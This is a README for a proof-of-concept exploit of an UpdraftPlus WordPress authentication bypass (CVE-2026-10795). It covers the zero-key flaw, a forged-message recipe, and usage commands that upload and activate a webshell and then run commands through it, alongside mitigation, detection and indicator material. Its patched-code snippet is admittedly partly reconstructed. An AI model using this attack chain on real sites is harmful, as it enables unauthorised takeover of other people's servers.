## https://sploitus.com/exploit?id=F17976B9-4448-5BEE-AEAE-209CDB4A1A3C
# CVE-2026-10795 – UpdraftPlus Authentication Bypass PoC

> ⚠️ **Disclaimer:** This repository is for **educational purposes only**.  
> Only use this on systems you own or have explicit permission to test.  
> The author is not responsible for any misuse.

---

## 📋 Overview

| Field | Details |
|---|---|
| **Plugin** | UpdraftPlus: WP Backup & Migration |
| **Affected Versions** | ≤ 1.26.4 |
| **Patched Version** | 1.26.5 |
| **CVSS Score** | 8.1 (High) |
| **Vulnerability Type** | Unauthenticated Authentication Bypass → RCE |
| **Discovered by** | vtim (Wordfence Bug Bounty) |
| **Bounty** | $5,200 |

---

## 🔍 Vulnerability Summary

UpdraftPlus registers an **unauthenticated RPC listener** on every page load for sites connected to UpdraftCentral.

The `decrypt_message()` function fails to validate the return value of `$rsa->decrypt()`.  
When RSA decryption fails, `false` is passed to `Rijndael::setKey()`, which collapses to a **deterministic all-zero AES-128 key**.

An attacker can:
1. Forge a `udrpc_message` encrypted with the zero key
2. Have the server decrypt it successfully
3. Execute arbitrary RPC commands as the connected administrator
4. Upload & activate a malicious plugin → **Remote Code Execution**

---

## 🧬 Vulnerable Code

```php
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// โŒ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);
```

## ✅ Patched Code

```php
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
// Reject the message when RSA decryption failed or did not yield a usable key.
// The length bound and the failure branch were lost in extraction; a 16-byte
// (AES-128) minimum and a plain `return false` are assumed here.
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);
```

---

## 📁 Repository Structure

```
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Main exploit script
├── requirements.txt        # Python dependencies
├── payloads/
│   ├── list_plugins.py     # List installed plugins
│   ├── upload_shell.py     # Upload webshell plugin
│   └── activate_plugin.py  # Activate uploaded plugin
├── shell/
│   ├── build_shell.py      # Builds webshell ZIP
│   └── test-shell.php      # Minimal PHP webshell
└── docs/
    โ”œโ”€โ”€ technical-analysis.md
    โ””โ”€โ”€ patch-diff.md
```

---

## ⚙️ Installation

```bash
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt
```

**requirements.txt**
```
requests==2.31.0
pycryptodome==3.20.0
```

---

## 🧪 Test Environment Setup

### 1. Install XAMPP
```
https://www.apachefriends.org
Start: Apache + MySQL
```

### 2. Install WordPress + UpdraftPlus 1.26.4
```bash
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4
```

### 3. Connect to UpdraftCentral
```
WordPress Admin → Settings → UpdraftPlus → UpdraftCentral tab → Connect
```

> ⚠️ **Required:** Site must be connected to UpdraftCentral for the vulnerability to be exploitable.

---

## 🚀 Usage

### Basic Usage
```bash
python poc.py --url http://localhost/wordpress/ --user-id 1
```

### List Plugins
```bash
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins
```

### Upload Webshell
```bash
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"
```

---

## 🔬 How It Works

```
poc.py
  │
  ├─ 1. Craft malformed RSA-encrypted sym_key (garbage bytes)
  │
  ├─ 2. Encrypt RPC payload with ZERO AES-128 key (0x00 * 16)
  │
  ├─ 3. Build udrpc_message:
  │       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  │
  ├─ 4. POST to target (no auth, no nonce, no cookies needed)
  │
  └─ 5. Server-side:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → our payload ✅
          wp_set_current_user() → admin access
          RPC command executes  → RCE 💀
```

---

## 🛡️ Detection & Mitigation

### Mitigation
```
Update UpdraftPlus to version 1.26.5 immediately.
```

### Detection (Log Analysis)
```bash
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026
```

### Indicators of Compromise
```
- Unexpected plugin installations
- New PHP files in wp-content/plugins/
- POST requests to WordPress root with udrpc_message parameter
- Unexpected admin-level actions in WordPress logs
```
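A defender-side scanner for the log-visible indicators above, added here as an example and not part of this repository: it applies two checks to constructed Apache combined-format lines, a `udrpc_message` parameter in the request and a PHP hit under a plugin directory missing from the site's inventory (the `known_plugins` set is an assumed input you would fill from `wp plugin list` or the filesystem).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-format prefix: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Constructed sample lines (not from a real incident); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2026:10:14:22 +0000] "POST /wordpress/?udrpc_message=AAAA HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
198.51.100.2 - - [03/Jun/2026:10:15:01 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Jun/2026:10:15:40 +0000] "GET /wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami HTTP/1.1" 200 31 "-" "curl/8.0"
"""
PLUGIN_PHP_RE = re.compile(r"/wp-content/plugins/([^/]+)/.*\.php$")  # PHP under a plugin slug

def parse_line(line):
    # Return the parsed fields for one line, or None if it is not a request line we understand.
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["path"])
    entry["path_only"] = parts.path
    entry["params"] = parse_qs(parts.query)
    return entry

def is_udrpc_probe(entry):
    # udrpc_message in the query string: an UpdraftCentral RPC message arriving from outside.
    return "udrpc_message" in entry["params"]

def is_unknown_plugin_php(entry, known_plugins):
    # Direct request to a PHP file under a plugin directory that is not in the site's inventory.
    m = PLUGIN_PHP_RE.search(entry["path_only"])
    return bool(m) and m.group(1) not in known_plugins

def scan(log_text, known_plugins):
    # Return (indicator, client_ip, request_path) for every line that trips a check.
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if is_udrpc_probe(entry):
            findings.append(("udrpc_message", entry["ip"], entry["path"]))
        if is_unknown_plugin_php(entry, known_plugins):
            findings.append(("unknown_plugin_php", entry["ip"], entry["path"]))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, {"updraftplus"}))
```

Default Apache access logs record the query string but not the POST body, so both this scanner and the `grep` above only see `udrpc_message` when it is carried in the URL; catching it inside a POST body needs a WAF or request-body logging.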

---

## 📅 Disclosure Timeline

| Date | Event |
|---|---|
| June 1, 2026 | Vulnerability submitted via Wordfence Bug Bounty |
| June 3, 2026 | Validated & disclosed to vendor |
| June 3, 2026 | Wordfence Premium firewall rule deployed |
| June 4, 2026 | Vendor acknowledged |
| June 5, 2026 | Patch released (v1.26.5) |
| July 3, 2026 | Wordfence Free protection active |

---

## 📚 References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/)
- [UpdraftPlus Plugin Page](https://wordpress.org/plugins/updraftplus/)
- [phpseclib RSA Documentation](https://phpseclib.com/docs/rsa)
- [Plugin Changelog](https://plugins.trac.wordpress.org/browser/updraftplus/)

---

## 👤 Credits

- **Original Discovery:** vtim (Wordfence Bug Bounty Program)
- **PoC Author:** izxci
- **Purpose:** Educational / Security Research

---

## 📜 License

```
MIT License – For educational use only.
Unauthorized use against systems you don't own is illegal.
```